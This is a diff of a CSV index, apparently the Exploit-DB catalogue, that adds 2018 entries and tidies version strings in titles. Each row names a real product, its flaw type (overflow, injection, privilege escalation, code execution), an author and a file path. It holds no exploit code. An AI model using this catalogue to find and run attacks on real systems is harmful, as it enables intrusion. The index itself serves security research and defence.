+44273,exploits/windows/dos/44273.py,"Allok QuickTime to AVI MPEG DVD Converter 3.6.1217 - Buffer Overflow",2018-03-12,"Mohan Ravichandran",dos,windows,
 42994,exploits/windows/dos/42994.txt,"Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution",2017-09-28,"Eduardo Braun Prado",dos,windows,
 42995,exploits/windows/dos/42995.txt,"Microsoft Excel - OLE Arbitrary Code Execution",2017-09-30,"Eduardo Braun Prado",dos,windows,
 42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows,
@@ -5815,6 +5816,7 @@ id,file,description,date,author,type,platform,port
 43060,exploits/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge < 2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",dos,windows,
 43111,exploits/multiple/dos/43111.py,"GraphicsMagick - Memory Disclosure / Heap Overflow",2017-11-03,SecuriTeam,dos,multiple,
 43115,exploits/windows/dos/43115.py,"Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH)",2017-11-03,"Kevin McGuigan",dos,windows,
+43116,exploits/windows/dos/43116.py,"Jnes 1.0.2 - Stack Buffer Overflow",2017-11-03,crash_manucoot,dos,windows,
 43119,exploits/hardware/dos/43119.py,"Debut Embedded HTTPd 1.20 - Denial of Service",2017-11-02,z00n,dos,hardware,
 43120,exploits/windows/dos/43120.txt,"Avaya IP Office (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,dos,windows,
 43124,exploits/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,dos,windows,
@@ -5853,6 +5855,7 @@ id,file,description,date,author,type,platform,port
 43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)",2017-11-30,Bindecy,dos,linux,
 43469,exploits/windows/dos/43469.js,"Microsoft Edge Chakra JIT - Escape Analysis Bug",2018-01-09,"Google Security Research",dos,windows,
 43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows,
+43208,exploits/windows/dos/43208.py,"Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow",2017-12-01,ret2eax,dos,windows,
 43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows,
 43233,exploits/multiple/dos/43233.txt,"Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash",2017-12-07,Wireshark,dos,multiple,
 43234,exploits/linux/dos/43234.c,"Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free",2017-12-07,"Mohamed Ghannam",dos,linux,
@@ -5878,6 +5881,7 @@ id,file,description,date,author,type,platform,port
 44183,exploits/linux/dos/44183.py,"Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service",2018-02-27,EnableSecurity,dos,linux,5060
 44184,exploits/linux/dos/44184.py,"Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption",2018-02-27,EnableSecurity,dos,linux,5060
 44189,exploits/windows/dos/44189.py,"Microsoft Windows 8.1/2012 R2 - SMBv3 Null Pointer Dereference Denial of Service",2018-02-27,"Nabeel Ahmed",dos,windows,
+44190,exploits/linux/dos/44190.py,"netek 0.8.2 - Denial of Service",2018-02-27,"Lawrence Amer",dos,linux,
 44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware,
 44211,exploits/freebsd_x86-64/dos/44211.c,"FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
 44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
@@ -5926,6 +5930,7 @@ id,file,description,date,author,type,platform,port
 44427,exploits/multiple/dos/44427.txt,"WebKit - WebAssembly Parsing Does not Correctly Check Section Order",2018-04-09,"Google Security Research",dos,multiple,
 44428,exploits/linux/dos/44428.txt,"CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure",2018-04-09,"RedTeam Pentesting",dos,linux,
 44442,exploits/multiple/dos/44442.js,"Google Chrome V8 JIT - 'LoadElimination::ReduceTransitionElementsKind' Type Confusion",2018-04-10,"Google Security Research",dos,multiple,
+44451,exploits/hardware/dos/44451.py,"Cisco Smart Install - Crash (PoC)",2018-03-29,embedi,dos,hardware,
 44456,exploits/hardware/dos/44456.py,"Barco ClickShare CSE-200 - Remote Denial of Service",2018-04-16,"Florian Hauser",dos,hardware,7100
 44458,exploits/windows/dos/44458.cpp,"Microsoft Windows - 'nt!NtQueryFullAttributesFile' Kernel Stack Memory Disclosure",2018-04-16,"Google Security Research",dos,windows,
 44459,exploits/windows/dos/44459.cpp,"Microsoft Windows - 'nt!NtQueryAttributesFile' Kernel Stack Memory Disclosure",2018-04-16,"Google Security Research",dos,windows,
@@ -5958,6 +5963,8 @@ id,file,description,date,author,type,platform,port
 44561,exploits/macos/dos/44561.txt,"Apple macOS 10.13.2 - Double mach_port_deallocate in kextd due to Failure to Comply with MIG Ownership Rules",2018-04-30,"Google Security Research",dos,macos,
 44562,exploits/multiple/dos/44562.c,"Apple macOS/iOS - ReportCrash mach port Replacement due to Failure to Respect MIG Ownership Rules",2018-04-30,"Google Security Research",dos,multiple,
 44566,exploits/multiple/dos/44566.html,"WebKit - 'WebCore::jsElementScrollHeightGetter' Use-After-Free",2018-05-02,"Google Security Research",dos,multiple,
+44572,exploits/windows/dos/44572.txt,"Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service",2018-05-02,"Tenable NS",dos,windows,
+44579,exploits/linux/dos/44579.c,"Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -8557,7 +8564,7 @@ id,file,description,date,author,type,platform,port
 25406,exploits/linux/local/25406.sh,"Kloxo 6.1.6 - Local Privilege Escalation",2013-05-13,HTP,local,linux,
 25411,exploits/linux/local/25411.py,"No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow",2013-05-13,"Alberto Ortega",local,linux,
 25419,exploits/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - '.m3u' Local Buffer Overflow (SEH)",2013-05-13,seaofglass,local,windows,
-25444,exploits/linux/local/25444.c,"Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Local Privilege Escalation (1)",2013-05-14,sd,local,linux,
+25444,exploits/linux/local/25444.c,"Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1)",2013-05-14,sd,local,linux,
 25448,exploits/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,local,windows,
 25450,exploits/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Local Privilege Escalation",2013-05-14,"Andrew Lutomirski",local,linux,
 25554,exploits/windows/local/25554.c,"Altiris Client 6.0.88 - Service Privilege Escalation",2005-04-27,"Reed Arvin",local,windows,
@@ -9691,6 +9698,8 @@ id,file,description,date,author,type,platform,port
 44549,exploits/windows/local/44549.py,"Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)",2018-04-26,T3jv1l,local,windows,
 44564,exploits/windows/local/44564.py,"LibreOffice/Open Office - '.odt' Information Disclosure",2018-05-02,"Richard Davy",local,windows,
 44565,exploits/windows/local/44565.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH)",2018-05-02,"Marwan Shamel",local,windows,
+44573,exploits/windows/local/44573.txt,"Adobe Reader PDF - Client Side Request Injection",2018-05-02,"Alex Inführ",local,windows,
+44581,exploits/windows/local/44581.c,"Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16148,7 +16157,7 @@ id,file,description,date,author,type,platform,port
 41592,exploits/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,remote,windows,
 41598,exploits/cgi/remote/41598.rb,"NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,remote,cgi,80
 41613,exploits/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,remote,windows,8800
-41614,exploits/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080
+41614,exploits/multiple/remote/41614.rb,"Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080
 43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android,
 43356,exploits/php/remote/43356.rb,"Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)",2017-12-18,Metasploit,remote,php,
 43360,exploits/linux/remote/43360.py,"GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80
@@ -16437,6 +16446,7 @@ id,file,description,date,author,type,platform,port
 44357,exploits/windows/remote/44357.rb,"Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
 44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592
 44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,
+44412,exploits/multiple/remote/44412.py,"Adobe Flash < 28.0.0.161 - Use-After-Free",2018-04-06,SyFi,remote,multiple,
 44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
 44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
 44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows,
@@ -16454,6 +16464,10 @@ id,file,description,date,author,type,platform,port
 44569,exploits/ruby/remote/44569.rb,"Metasploit Framework - 'msfd' Remote Code Execution (via Browser) (Metasploit)",2018-05-02,Metasploit,remote,ruby,55554
 44570,exploits/ruby/remote/44570.rb,"Metasploit Framework - 'msfd' Remote Code Execution (Metasploit)",2018-05-02,Metasploit,remote,ruby,55554
 44571,exploits/linux/remote/44571.py,"Exim < 4.90.1 - 'base64d' Remote Code Execution",2018-05-02,straight_blast,remote,linux,25
+44574,exploits/hardware/remote/44574.txt,"Norton Core Secure WiFi Router - 'BLE' Command Injection (PoC)",2018-05-02,embedi,remote,hardware,
+44576,exploits/hardware/remote/44576.sh,"GPON Routers - Authentication Bypass / Command Injection",2018-05-03,vpnmentor,remote,hardware,
+44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,
+44582,exploits/windows/remote/44582.txt,"Call of Duty Modern Warefare 2 - Buffer Overflow",2018-05-02,momo5502,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -18514,7 +18528,7 @@ id,file,description,date,author,type,platform,port
 4284,exploits/php/webapps/4284.txt,"Prozilla Webring Website Script - 'category.php?cat' SQL Injection",2007-08-13,t0pP8uZz,webapps,php,
 4286,exploits/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Authentication Bypass / SQL Injection",2007-08-14,s4squatch,webapps,cgi,
 4291,exploits/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php?query' SQL Injection",2007-08-16,RoXur777,webapps,php,
-4295,exploits/php/webapps/4295.txt,"Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion",2007-08-19,ShaiMagal,webapps,php,
+4295,exploits/php/webapps/4295.txt,"Squirrelcart 1.x - 'cart.php' Remote File Inclusion",2007-08-19,ShaiMagal,webapps,php,
 4296,exploits/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,webapps,php,
 4300,exploits/php/webapps/4300.txt,"litecommerce 2004 - 'category_id' SQL Injection",2007-08-21,k1tk4t,webapps,php,
 4305,exploits/php/webapps/4305.txt,"Joomla! Component NeoRecruit 1.4 - 'id' SQL Injection",2007-08-23,ajann,webapps,php,
@@ -22131,7 +22145,7 @@ id,file,description,date,author,type,platform,port
 9459,exploits/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,webapps,php,
 9460,exploits/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,webapps,php,
 9461,exploits/php/webapps/9461.txt,"E CMS 1.0 - 'index.php?s' SQL Injection",2009-08-18,Red-D3v1L,webapps,php,
-9462,exploits/php/webapps/9462.txt,"Infinity 2.x.x - options[style_dir] Local File Disclosure",2009-08-18,SwEET-DeViL,webapps,php,
+9462,exploits/php/webapps/9462.txt,"Infinity 2.x - 'options[style_dir]' Local File Disclosure",2009-08-18,SwEET-DeViL,webapps,php,
 9463,exploits/php/webapps/9463.php,"Joomla! Component MisterEstate - Blind SQL Injection",2009-08-18,jdc,webapps,php,
 9464,exploits/php/webapps/9464.txt,"Fotoshow PRO - 'category' SQL Injection",2009-08-18,darkmasking,webapps,php,
 9465,exploits/php/webapps/9465.txt,"phpfreeBB 1.0 - Blind SQL Injection",2009-08-18,Moudi,webapps,php,
@@ -24463,7 +24477,7 @@ id,file,description,date,author,type,platform,port
 14578,exploits/php/webapps/14578.php,"PHPKick 0.8 - 'Statistics.php' SQL Injection",2010-08-08,garwga,webapps,php,
 14585,exploits/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,webapps,php,
 14598,exploits/php/webapps/14598.txt,"Joomla! Component Teams - Multiple Blind SQL Injections",2010-08-10,"Salvatore Fresta",webapps,php,
-14589,exploits/php/webapps/14589.txt,"PHP-Nuke 8.x.x - Blind SQL Injection",2010-08-09,ITSecTeam,webapps,php,
+14589,exploits/php/webapps/14589.txt,"PHP-Nuke 8.x - Blind SQL Injection",2010-08-09,ITSecTeam,webapps,php,
 14592,exploits/php/webapps/14592.txt,"Joomla! Component com_yellowpages - SQL Injection",2010-08-09,"al bayraqim",webapps,php,
 14595,exploits/php/webapps/14595.html,"wizmall 6.4 - Cross-Site Request Forgery",2010-08-09,pyw1414,webapps,php,
 14596,exploits/php/webapps/14596.txt,"Joomla! Component Amblog 1.0 - Multiple SQL Injections",2010-08-10,"Salvatore Fresta",webapps,php,
@@ -25688,7 +25702,7 @@ id,file,description,date,author,type,platform,port
 17995,exploits/php/webapps/17995.txt,"Joomla! Plugin NoNumber Framework - Multiple Vulnerabilities",2011-10-18,jdc,webapps,php,
 17997,exploits/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection / Cross-Site Scripting",2011-10-19,"Stefan Schurtz",webapps,php,
 17998,exploits/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection",2011-10-19,"I2sec-dae jin Oh",webapps,php,
-17999,exploits/php/webapps/17999.txt,"WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - 'cart.php' Local File Disclosure",2011-10-19,"Lagripe-Dz & Mca-Crb",webapps,php,
+17999,exploits/php/webapps/17999.txt,"WHMCompleteSolution (WHMCS) 3.x < 4.0.x - 'cart.php' Local File Disclosure",2011-10-19,"Lagripe-Dz & Mca-Crb",webapps,php,
 18000,exploits/php/webapps/18000.txt,"1024 CMS 1.1.0 Beta - 'force_download.php' Local File Inclusion",2011-10-19,"Sangyun YOO",webapps,php,
 18001,exploits/php/webapps/18001.txt,"CMS mini 0.2.2 - Local File Inclusion",2011-10-20,BeopSeong/I2Sec,webapps,php,
 18002,exploits/php/webapps/18002.txt,"Uiga Personal Portal - Multiple Vulnerabilities",2011-10-20,"Eyup CELIK",webapps,php,
@@ -25727,7 +25741,7 @@ id,file,description,date,author,type,platform,port
 18075,exploits/php/webapps/18075.txt,"Ajax File and Image Manager 1.0 Final - Remote Code Execution",2011-11-04,EgiX,webapps,php,
 18076,exploits/php/webapps/18076.txt,"Advanced Poll 2.02 - SQL Injection",2011-11-04,"Yassin Aboukir",webapps,php,
 18077,exploits/windows/webapps/18077.txt,"HP Data Protector Media Operations 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",webapps,windows,
-18081,exploits/php/webapps/18081.txt,"WHMCompleteSolution (WHMCS) 3.x.x - 'clientarea.php' Local File Disclosure",2011-11-04,"red virus",webapps,php,
+18081,exploits/php/webapps/18081.txt,"WHMCompleteSolution (WHMCS) 3.x - 'clientarea.php' Local File Disclosure",2011-11-04,"red virus",webapps,php,
 18083,exploits/php/webapps/18083.php,"ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,webapps,php,
 18084,exploits/php/webapps/18084.php,"PHPMyFAQ 2.7.0 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,webapps,php,
 18085,exploits/php/webapps/18085.php,"aidiCMS 3.55 - 'ajax_create_folder.php' Remote Code Execution",2011-11-05,EgiX,webapps,php,
@@ -28136,7 +28150,7 @@ id,file,description,date,author,type,platform,port
 25403,exploits/php/webapps/25403.txt,"phpBB Photo Album 2.0.53 Module - 'Album_Cat.php' Cross-Site Scripting",2005-04-13,Dcrab,webapps,php,
 25404,exploits/php/webapps/25404.txt,"phpBB Photo Album Module 2.0.53 - 'Album_Comment.php' Cross-Site Scripting",2005-04-13,Dcrab,webapps,php,
 25405,exploits/php/webapps/25405.txt,"Getsimple CMS 3.2.1 - Arbitrary File Upload",2013-05-13,"Ahmed Elhady Mohamed",webapps,php,
-25409,exploits/php/webapps/25409.txt,"Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities",2013-05-13,AtT4CKxT3rR0r1ST,webapps,php,
+25409,exploits/php/webapps/25409.txt,"Ajax Availability Calendar 3.x - Multiple Vulnerabilities",2013-05-13,AtT4CKxT3rR0r1ST,webapps,php,
 25410,exploits/php/webapps/25410.txt,"Joomla! Component com_s5clanroster - 'id' SQL Injection",2013-05-13,AtT4CKxT3rR0r1ST,webapps,php,
 25412,exploits/ios/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,webapps,ios,
 25413,exploits/hardware/webapps/25413.txt,"Wifi Photo Transfer 2.1/1.1 PRO - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,webapps,hardware,
@@ -35257,13 +35271,13 @@ id,file,description,date,author,type,platform,port
 36228,exploits/php/webapps/36228.txt,"BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",webapps,php,
 36230,exploits/php/webapps/36230.txt,"WordPress Plugin Calculated Fields Form 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",webapps,php,
 36231,exploits/php/webapps/36231.py,"GoAutoDial CE 2.0 - Arbitrary File Upload",2015-02-28,R-73eN,webapps,php,
-36232,exploits/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,webapps,php,80
+36232,exploits/php/webapps/36232.txt,"vBulletin vBSEO 4.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,webapps,php,80
 36233,exploits/php/webapps/36233.txt,"WordPress Plugin Pretty Link 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",webapps,php,
 36236,exploits/php/webapps/36236.txt,"Xenon - 'id' Multiple SQL Injections",2011-10-14,m3rciL3Ss,webapps,php,
 36237,exploits/php/webapps/36237.txt,"asgbookPHP 1.9 - 'index.php' Cross-Site Scripting",2011-10-17,indoushka,webapps,php,
 36240,exploits/php/webapps/36240.txt,"Site@School 2.4.10 - '/index.php' Cross-Site Scripting / SQL Injection",2011-10-18,"Stefan Schurtz",webapps,php,
 36241,exploits/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - Local File Inclusion",2015-03-03,"Loudiyi Mohamed",webapps,hardware,
-36242,exploits/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting",2015-03-03,ayastar,webapps,php,
+36242,exploits/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x - SQL Injection / Cross-Site Scripting",2015-03-03,ayastar,webapps,php,
 36243,exploits/php/webapps/36243.txt,"WordPress Plugin cp-multi-view-calendar 1.1.4 - SQL Injection",2015-03-03,"i0akiN SEC-LABORATORY",webapps,php,
 36248,exploits/php/webapps/36248.txt,"osCommerce - Arbitrary File Upload / File Disclosure",2011-10-20,indoushka,webapps,php,
 36249,exploits/php/webapps/36249.txt,"Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",webapps,php,
@@ -36643,7 +36657,7 @@ id,file,description,date,author,type,platform,port
 38520,exploits/php/webapps/38520.html,"WordPress Plugin WP Cleanfix - Cross-Site Request Forgery",2013-05-16,"Enigma Ideas",webapps,php,
 38523,exploits/php/webapps/38523.txt,"Weyal CMS - Multiple SQL Injections",2013-05-23,XroGuE,webapps,php,
 38524,exploits/php/webapps/38524.pl,"Matterdaddy Market - Multiple Vulnerabilities",2013-05-24,KedAns-Dz,webapps,php,
-38525,exploits/php/webapps/38525.txt,"Subrion 3.X.x - Multiple Vulnerabilities",2015-10-23,bRpsd,webapps,php,
+38525,exploits/php/webapps/38525.txt,"Subrion 3.x - Multiple Vulnerabilities",2015-10-23,bRpsd,webapps,php,
 38527,exploits/php/webapps/38527.txt,"Joomla! Component Realtyna RPL 8.9.2 - Multiple SQL Injections",2015-10-23,"Bikramaditya Guha",webapps,php,
 38528,exploits/php/webapps/38528.txt,"Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2015-10-23,"Bikramaditya Guha",webapps,php,
 38572,exploits/php/webapps/38572.txt,"PHP Server Monitor 3.1.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-10-30,hyp3rlinx,webapps,php,
@@ -39094,6 +39108,7 @@ id,file,description,date,author,type,platform,port
 43340,exploits/windows/webapps/43340.rb,"Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)",2017-12-14,Metasploit,webapps,windows,4592
 43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi,
 43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80
+43347,exploits/php/webapps/43347.txt,"Ciuis CRM 1.0.7 - SQL Injection",2017-12-18,"Zahid Abbasi",webapps,php,
 43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php,
 43349,exploits/php/webapps/43349.txt,"Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
 44158,exploits/php/webapps/44158.txt,"Joomla! Component CW Tags 2.0.6 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php,
@@ -39173,6 +39188,7 @@ id,file,description,date,author,type,platform,port
 44386,exploits/perl/webapps/44386.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal",2018-04-02,LiquidWorm,webapps,perl,
 44387,exploits/hardware/webapps/44387.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials",2018-04-02,LiquidWorm,webapps,hardware,
 44388,exploits/hardware/webapps/44388.txt,"DLink DIR-601 - Admin Password Disclosure",2018-04-02,"Kevin Randall",webapps,hardware,
+44390,exploits/windows/webapps/44390.py,"LifeSize ClearSea 3.1.4 - Directory Traversal",2018-04-02,rsp3ar,webapps,windows,
 44391,exploits/php/webapps/44391.html,"OpenCMS 10.5.3 - Cross-Site Request Forgery",2018-04-02,"Sureshbabu Narvaneni",webapps,php,
 44392,exploits/php/webapps/44392.txt,"OpenCMS 10.5.3 - Cross-Site Scripting",2018-04-02,"Sureshbabu Narvaneni",webapps,php,
 44393,exploits/hardware/webapps/44393.sh,"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change",2018-04-02,"Todor Donev",webapps,hardware,
@@ -39184,6 +39200,7 @@ id,file,description,date,author,type,platform,port
 44406,exploits/php/webapps/44406.txt,"Z-Blog 1.5.1.1740 - Cross-Site Scripting",2018-04-05,zzw,webapps,php,
 44407,exploits/php/webapps/44407.txt,"Z-Blog 1.5.1.1740 - Full Path Disclosure",2018-04-05,zzw,webapps,php,
 44408,exploits/php/webapps/44408.txt,"GetSimple CMS 3.3.13 - Cross-Site Scripting",2018-04-05,"Sureshbabu Narvaneni",webapps,php,
+44409,exploits/php/webapps/44409.txt,"WordPress Plugin Activity Log 2.4.0 - Cross-Site Scripting",2018-04-05,"Stefan Broeder",webapps,php,
 44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware,
 44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows,
 44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross-Site Request Forgery",2018-04-06,ppb,webapps,php,
@@ -39257,3 +39274,5 @@ id,file,description,date,author,type,platform,port
 44560,exploits/php/webapps/44560.py,"Nagios XI 5.2.6 < 5.2.9 / 5.3 / 5.4 - Chained Remote Root",2018-04-30,"Jared Arave",webapps,php,
 44563,exploits/php/webapps/44563.txt,"WordPress Plugin Responsive Cookie Consent 1.7 / 1.6 / 1.5 - Authenticated Persistent Cross-Site Scripting",2018-05-01,B0UG,webapps,php,
 44567,exploits/php/webapps/44567.txt,"Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery",2018-05-02,"Qian Wu_ Bo Wang_ Jiawang Zhang",webapps,php,80
+44580,exploits/hardware/webapps/44580.txt,"DLINK DCS-5020L - Remote Code Execution (PoC)",2018-03-27,"Fidus InfoSecurity",webapps,hardware,
+44583,exploits/multiple/webapps/44583.txt,"Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection",2014-01-14,"Takeshi Terada",webapps,multiple,